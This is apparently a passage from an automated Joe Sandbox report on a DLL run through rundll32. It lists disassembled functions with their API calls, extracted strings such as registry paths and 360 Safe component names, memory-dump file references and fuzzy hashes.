                                                                  • Instruction Fuzzy Hash: 43D1D072300A8886EBA6DF25E8507ED37A1F749BD8F448614FE5647BA8DF38C249C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180062148 Relevance: 43.9, APIs: 14, Strings: 11, Instructions: 114libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$Modulememset$CombineFileFreeHandleLibraryNamePath
                                                                  • String ID: ..\ipc\x64for32lib.dll$EnumProcessModules64$GetCommandLine64$GetCurrentDirectory64$GetModuleBaseNameW64$GetModuleFileNameExW64$GetModuleInformation64$IsProcessWow64Process$NtQueryInformationProcess64$NtQueryInformationThread64$ReadProcessMemory64
                                                                  • API String ID: 3359005274-2277939915
                                                                  • Opcode ID: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
                                                                  • Instruction ID: 36480451210aca2b5e6fe81c352119384c097133635e903ecd0715684d47c6ca
                                                                  • Opcode Fuzzy Hash: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
                                                                  • Instruction Fuzzy Hash: 2D512532201F5AA2EEA58F51E99439833A5FB4C7C0F549525EA5907A60DF38D3B9C710
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004B1A4 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 223processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Token$CloseHandleInformationProcess$AdjustBlockCreateEnvironmentErrorLastPrivilegesUser$ActiveConsoleCurrentDestroyDuplicateLookupOpenPrivilegeQuerySessionValuememset
                                                                  • String ID: SeTcbPrivilege$h$winsta0\default
                                                                  • API String ID: 2730501308-2823425829
                                                                  • Opcode ID: da626f246ce0b3925ee1fe27a827f12215fb960ca2972f5f4b6fa681b72b113d
                                                                  • Instruction ID: 63acb98c3057d7eee2a2f85741aa180b658631cb3bbab8e9928767d1695d7121
                                                                  • Opcode Fuzzy Hash: da626f246ce0b3925ee1fe27a827f12215fb960ca2972f5f4b6fa681b72b113d
                                                                  • Instruction Fuzzy Hash: A4A11072608B8486E7A1CF65F8507DAB7E4F7CC794F518125EA8983B68DF38C649CB04
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180002610 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 416registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Close$Open$Enumfree
                                                                  • String ID: HKEY_LOCAL_MACHINE\$\Components\$\Features\$\Products\
                                                                  • API String ID: 1285027818-2258373985
                                                                  • Opcode ID: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
                                                                  • Instruction ID: 6311c4a4e92b2eb2b6e61e2371f742115398930d0f6aaa53fdf69de799299566
                                                                  • Opcode Fuzzy Hash: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
                                                                  • Instruction Fuzzy Hash: 9C126F72218AC891FAB2EB55E8453DAB365FB897C4F448111FA8E43A99DF3DC749C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180060578 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 289registrywindowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Windowmemset$MessageQuerySendTimeoutValue$CloseFindForegroundOpenmemmove
                                                                  • String ID: MsgCenter$Q360SafeMonClass$TS2P$activeapp$activeweb
                                                                  • API String ID: 3772276521-2728888700
                                                                  • Opcode ID: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
                                                                  • Instruction ID: ee8cae4e48a5beadbc07239537d79e19b069e47090ef93ff609d4821bf219365
                                                                  • Opcode Fuzzy Hash: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
                                                                  • Instruction Fuzzy Hash: C1D19172604B4886EB51DF25E8403DE7761F789BE8F608215EAAD43BE5DF38C649CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018007E7C7 Relevance: 28.7, APIs: 16, Strings: 3, Instructions: 248COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: free$calloc$memset
                                                                  • String ID: -$]$]
                                                                  • API String ID: 2591755499-1349866957
                                                                  • Opcode ID: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
                                                                  • Instruction ID: 1d85a50f400dc416e5d0a718f77556582d5ce19bdf984b68484f18af02043cc0
                                                                  • Opcode Fuzzy Hash: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
                                                                  • Instruction Fuzzy Hash: BCA1D272706BC892EB96CB16D0403A977A1F74D780F449616EB8A17B81DF39D2B9D300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005D014 Relevance: 28.4, APIs: 8, Strings: 8, Instructions: 422timesynchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Timefree$??3@System$FileMutexRelease
                                                                  • String ID: AND $ SLEV = %d $ TYPE = %d$ WHERE $DELETE FROM 'MT' $INSERT INTO "MT" VALUES ( ?,?,?,?,?,?,?,?,?,?,?,?,NULL ) $ModName LIKE '$TimeStamp < %I64d;
                                                                  • API String ID: 2360919559-3261407791
                                                                  • Opcode ID: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
                                                                  • Instruction ID: fbbc87ecfbf22c2b8803d4662eccf4799cfebf60f86054df91e993a66dbd8da4
                                                                  • Opcode Fuzzy Hash: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
                                                                  • Instruction Fuzzy Hash: B102B332711A4C85FFB29BA5D4403DD2361AB887D8F148627BE2E6B7D4DE3AC649C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180052FD8 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 303registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CloseDeleteEnterLeaveOpenmemset
                                                                  • String ID: %s\%s$Catalog_Entries$Catalog_Entries64$NameSpace_Catalog5$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s\%012d
                                                                  • API String ID: 2413450229-732542554
                                                                  • Opcode ID: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
                                                                  • Instruction ID: 3ab1713314ff84c9548747a70e29f101a91a5434d94fe8d6158548384223fcd6
                                                                  • Opcode Fuzzy Hash: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
                                                                  • Instruction Fuzzy Hash: 69C1DEB1701A4D82EEA6DB29E8457D963A0F788BD4F04C422FE0D1B7A5DF39C64AC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018000834C Relevance: 19.8, APIs: 13, Instructions: 336stringregistryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CA7
                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CD3
                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008D81
                                                                  • lstrcmpiW.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00000001800083C8
                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800083E6
                                                                  • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008457
                                                                  • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008541
                                                                  • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 000000018000855D
                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800085C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$lstrcmpi$Value
                                                                  • String ID:
                                                                  • API String ID: 3520330261-0
                                                                  • Opcode ID: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
                                                                  • Instruction ID: 54a0f5542f62afcd6411b2081a4c08be2fbbe8d603b0a409542dd15f8ed12d0a
                                                                  • Opcode Fuzzy Hash: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
                                                                  • Instruction Fuzzy Hash: D3D1643260864982FBA2DB15E8543DA76E1FB9C7D0F91C121BA99476E4EF38C74DD700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180060174 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 270COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _wtoi$Value$??3@memset
                                                                  • String ID: %d|%d|%d|%d$MontiorInfo$MsgCenter
                                                                  • API String ID: 1219333133-3184008533
                                                                  • Opcode ID: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
                                                                  • Instruction ID: 3a97e8b4d36ab7b0ff62b7c8c746816c118d75ce1dcaba847e92933311b9e76e
                                                                  • Opcode Fuzzy Hash: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
                                                                  • Instruction Fuzzy Hash: FDC1B472604B4887EB51CF29E84039E77A1F789BA4F208216FAAD577A4DF78D644CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180040CB0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 78libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Version$AddressHandleModuleProcValueatoimemset
                                                                  • String ID: CurrentVersion$RtlGetVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                  • API String ID: 1009632096-1820686997
                                                                  • Opcode ID: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
                                                                  • Instruction ID: 603b8f84a57364ab934b969a098bbde4f8155cf87e7eb2653b8acdc6aa15b94a
                                                                  • Opcode Fuzzy Hash: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
                                                                  • Instruction Fuzzy Hash: 0F416D31615A498AF792CF20EC883DB77A0F78C7A5F918115F56A426A8DF3CD24CCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800647B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 395memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@CriticalSectionString$??2@AllocAttributesEnterFileFreeLeavememmove
                                                                  • String ID: 360util
                                                                  • API String ID: 2488163691-2294763832
                                                                  • Opcode ID: 04b2a6e28f52e73c8fb9b448fab7648155792c5097cb6c97d153a05ebb3aa3d7
                                                                  • Instruction ID: 9938724ed40c23cc8900e9648d175c046ed33f6fe674e618e7d9782a5817fc1c
                                                                  • Opcode Fuzzy Hash: 04b2a6e28f52e73c8fb9b448fab7648155792c5097cb6c97d153a05ebb3aa3d7
                                                                  • Instruction Fuzzy Hash: AE029C73B01B488AEB91CB64D8443DD33A6FB48798F519226EE592BB94DF38C619C344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180070760 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentProcessUnhandled$CaptureContextCurrentDebuggerEntryFeatureFunctionLookupProcessorTerminateUnwindVirtualmemset
                                                                  • String ID:
                                                                  • API String ID: 2775880128-0
                                                                  • Opcode ID: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
                                                                  • Instruction ID: 97518c6b28749f0b1885d3d6b1dd33bd68934808d59c248e1302251445d11ba7
                                                                  • Opcode Fuzzy Hash: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
                                                                  • Instruction Fuzzy Hash: 1E413032A14B858AE751CF60EC503ED7360F799788F119229EA9D46B69EF78C398C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180049050 Relevance: 15.1, APIs: 10, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCurrentErrorHandleLastOpenToken$AdjustLookupPrivilegePrivilegesValue
                                                                  • String ID:
                                                                  • API String ID: 2007143780-0
                                                                  • Opcode ID: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
                                                                  • Instruction ID: d46f0c18e1a39d64aeb05f722a7361000aff992e322ccff9c5dcc36b437ee35a
                                                                  • Opcode Fuzzy Hash: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
                                                                  • Instruction Fuzzy Hash: 2E218032604B4982EB919F61E8583DA63A1FB8CBD5F458035FA9E47B64DF3CC6498B04
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180017FE8 Relevance: 13.8, APIs: 9, Instructions: 322COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$??3@CountEnterLeaveTickmemmove
                                                                  • String ID:
                                                                  • API String ID: 1944083165-0
                                                                  • Opcode ID: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
                                                                  • Instruction ID: f41da155b52ef09f3583e4d9bfd8bf17b476c2db053c24b9ffbabfba65fc2eed
                                                                  • Opcode Fuzzy Hash: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
                                                                  • Instruction Fuzzy Hash: 37E15932B01F449AEB92CFA1E8403DD33B6F748798F148125EE5967B98DE34C65AD344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018006A994 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 339COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _swprintf_c_l$ErrorFileLastSizemallocmemset
                                                                  • String ID: INIT
                                                                  • API String ID: 2772675779-4041279936
                                                                  • Opcode ID: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
                                                                  • Instruction ID: 738f7e56dffb12879fa424a41098a8b7db62e01a67729e30f645ff56db629163
                                                                  • Opcode Fuzzy Hash: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
                                                                  • Instruction Fuzzy Hash: 31E192727043588BF7A6EB6598507EA77A6F70D7C8F54C029AE5A43B86DF34C608CB10
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005912C Relevance: 10.7, APIs: 7, Instructions: 202COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memset$DevicesDisplayEnum
                                                                  • String ID:
                                                                  • API String ID: 2856225746-0
                                                                  • Opcode ID: 5c5709e5d7299c401f45f5ffd4562792fd3562d72889c1e19fc8d239cebed65d
